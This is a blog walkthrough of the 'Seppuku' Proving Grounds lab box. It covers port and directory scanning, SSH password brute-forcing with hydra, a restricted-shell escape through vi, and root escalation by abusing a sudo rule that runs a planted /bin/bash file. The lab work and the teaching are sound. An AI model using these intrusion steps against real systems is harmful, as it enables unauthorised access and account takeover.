HHHHarshil - InfoSec Blog

Isn't Everyone Hiding Something?

Home Writeups Resources

This is a write up for the box Seppuku on proving grounds which is a Linux based box rated as easy.

Enumeration: Port Scan

Starting off by running RustScan on the box to find out some open ports.

└─$ rustscan -a  -- -sC -sV                                                                            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                                                                                                                                                                                    
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                                                              
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                                                                                                                                                                                    
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.                                                                                          
: https://discord.gg/GFrQsGy           :       
: https://github.com/RustScan/RustScan :        
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/hhhharshil/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 

PORT     STATE SERVICE       REASON  VERSION                                                                          
21/tcp   open  ftp           syn-ack vsftpd 3.0.3
22/tcp   open  ssh           syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                       
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhKnaNVJ/YnScPD1GDZSIfyC/a4jjHhSnoEgi2c/c03kE4JVZbA4cTFeEHGq4PFTyiuchv9w9zNu8XtVIDhILb9K4D38EssujmpekrrAnYkS0yU8Kqas1+3FCY8xjz6a5yVdMk/aQVa4BfFXWnv+rdlio0ZFVdLDaRaG90KMUEVw18Ogzt9lBbnbf7gOR0EGPKW0
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC+yj9GRgyn2boC7Dw9un6PEwviM8NZ1CRTjmrHRFiOT+0co+OOwxD5RRQCxuS22zJgsiDIEka8ypTjYWlnJ9T8=
|   256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIESejQ038eElmlRfbqAgaRSK120jvrz9WQ5UcjxJdJ71                                    
80/tcp   open  http          syn-ack nginx 1.14.2                                                                     
| http-auth:    
| HTTP/1.1 401 Unauthorized\x0D             
|_  Basic realm=Restricted Content       
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn   syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   syn-ack Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid syn-ack LiteSpeed
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=o
| Issuer: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US/name=openlitespeed/organizationalUnitName=Testing/localityName=Virtual/emailAddress=mail@seppuku/initials=CP/dnQualifier=openlitespee
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-13T06:51:35
| Not valid after:  2022-08-11T06:51:35
| MD5:   2002 61c4 9f2d 6bfa 21d1 477c 21d9 e703
| SHA-1: e44a c855 93ba b3f8 b2f3 7ce5 db7f a350 2f49 c7ca
7601/tcp open  http          syn-ack Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http          syn-ack LiteSpeed httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration: HTTP

Since the web page on port 7061 mentions seppuku which is the box name I will start by attempting to look for any hidden directories with gobuster.

└─$ gobuster dir -u --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                                 1 ⨯
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/12/29 15:13:49 Starting gobuster in directory enumeration mode
/b                    (Status: 301) [Size: 319] [-->]
/a                    (Status: 301) [Size: 319] [-->]
/c                    (Status: 301) [Size: 319] [-->]
/t                    (Status: 301) [Size: 319] [-->]
/r                    (Status: 301) [Size: 319] [-->]
/d                    (Status: 301) [Size: 319] [-->]
/f                    (Status: 301) [Size: 319] [-->]
/e                    (Status: 301) [Size: 319] [-->]
/h                    (Status: 301) [Size: 319] [-->]
/w                    (Status: 301) [Size: 319] [-->]
/q                    (Status: 301) [Size: 319] [-->]
/database             (Status: 301) [Size: 326] [-->]
/production           (Status: 301) [Size: 328] [-->]
/keys                 (Status: 301) [Size: 322] [-->]      
/secret               (Status: 301) [Size: 324] [-->]    

Recursive directory busting displays that there is a keys directory located on the HTTP server running on port 7601.

The keys directory displays that there is a private and private.bak files. I will download these to my box. After viewing the contents it can be determined that these are the ssh private keys. But we do not have a user yet.

There is also a /secret folder which contains passwd and shadow files as well as a password list. I will download all these files.

First I looked at the passwd.bak folder for any users sadly it was a rabbit-hole.

└─$ cat passwd.bak | grep sh
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null

We did however get a hostname/username of seppuku from:

We have a password.list that we can use to bruteforce the ssh service.

└─$ hydra -l seppuku -P password.lst  ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-29 15:20:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 93 login tries (l:1/p:93), ~6 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found

We found a valid password of eeyoree for the user seppuku

SSH Foothold

After successfully logging in as the user seppuku we are greeted with a restricted bash shell

└─$ ssh seppuku@ 
seppuku@'s password: 
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 29 15:22:39 2021 from
seppuku@seppuku:~$ cd .
-rbash: cd: restricted

This can be bypassed however using a vi to escape the rbash shell

seppuku@seppuku:~$ vi
(in vi)
:set shell=/bin/bash

Privilege Escalation

Looking through the home folder of the user seppuku we find a .passwd file. Now that we have new credentials we can try switching users.

seppuku@seppuku:~$ ls -la
total 36
drwxr-xr-x 3 seppuku seppuku 4096 Dec 29 15:22 .
drwxr-xr-x 5 root    root    4096 May 13  2020 ..
-rw------- 1 seppuku seppuku   20 Dec 29 15:22 .bash_history
-rw-r--r-- 1 seppuku seppuku  220 May 13  2020 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13  2020 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13  2020 .gnupg
-rw-r--r-- 1 seppuku seppuku   33 Dec 29 14:48 local.txt
-rw-r--r-- 1 root    root      20 May 13  2020 .passwd
-rw-r--r-- 1 seppuku seppuku  807 May 13  2020 .profile
seppuku@seppuku:~$ cat .passwd 

seppuku@seppuku:/home$ su tanto
su: Authentication failure
seppuku@seppuku:/home$ su samurai

After switching users I did sudo -l to see what commands can be executed as root.

samurai@seppuku:/home$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

This appears to be a dead end till we are able to get into the tanto user however we do have a ssh key that we downloaded earlier.

I will chmod 600 the private key and ssh into the box as tanto.

└─$ ssh -i id_rsa tanto@ -t "bash -noprofile"
tanto@seppuku:~$ ls -la
total 28
drwxr-xr-x 4 tanto tanto 4096 Sep  1  2020 .
drwxr-xr-x 5 root  root  4096 May 13  2020 ..
-rw-r--r-- 1 tanto tanto  220 May 13  2020 .bash_logout
-rw-r--r-- 1 tanto tanto 3526 May 13  2020 .bashrc
drwx------ 3 tanto tanto 4096 May 13  2020 .gnupg
-rw-r--r-- 1 tanto tanto  807 May 13  2020 .profile
drwxr-xr-x 2 tanto tanto 4096 May 13  2020 .ssh

There is no folder named .cgi_bin so I will have to construct the path from the sudo -l output myself.

I created the .cgi_bin folder and then made a bin file which executes /bin/bash. Then chmod +x to ensure its executable by everyone.

tanto@seppuku:~/.cgi_bin$ echo "/bin/bash" > bin
tanto@seppuku:~/.cgi_bin$ chmod +x bin 
tanto@seppuku:~/.cgi_bin$ ls

Now to exploit this we have to su back to samurai and then run the command from sudo -l

samurai@seppuku:/home/tanto/.cgi_bin$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
samurai@seppuku:/home/tanto/.cgi_bin$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/home/tanto/.cgi_bin# whoami


  1. Directory busting exposed a /private and /secret directory which contained files allowing that allowed us to bruteforce ssh
  2. After logging in as Seppuku we had to escape the rbash shell using vi
  3. A .passwd file was found in seppukus home folder containing a password used to su to user samurai
  4. Samurai was able to execute a file located in tanto’s home folder as root.
  5. The SSH key found from /private belonged to tanto
  6. SSH as the user tanto escape the rbash shell again.
  7. Create the .cgibin/ directory with a bin file executing /bin/bash
  8. su back to samurai execute the command from sudo -l then get root user.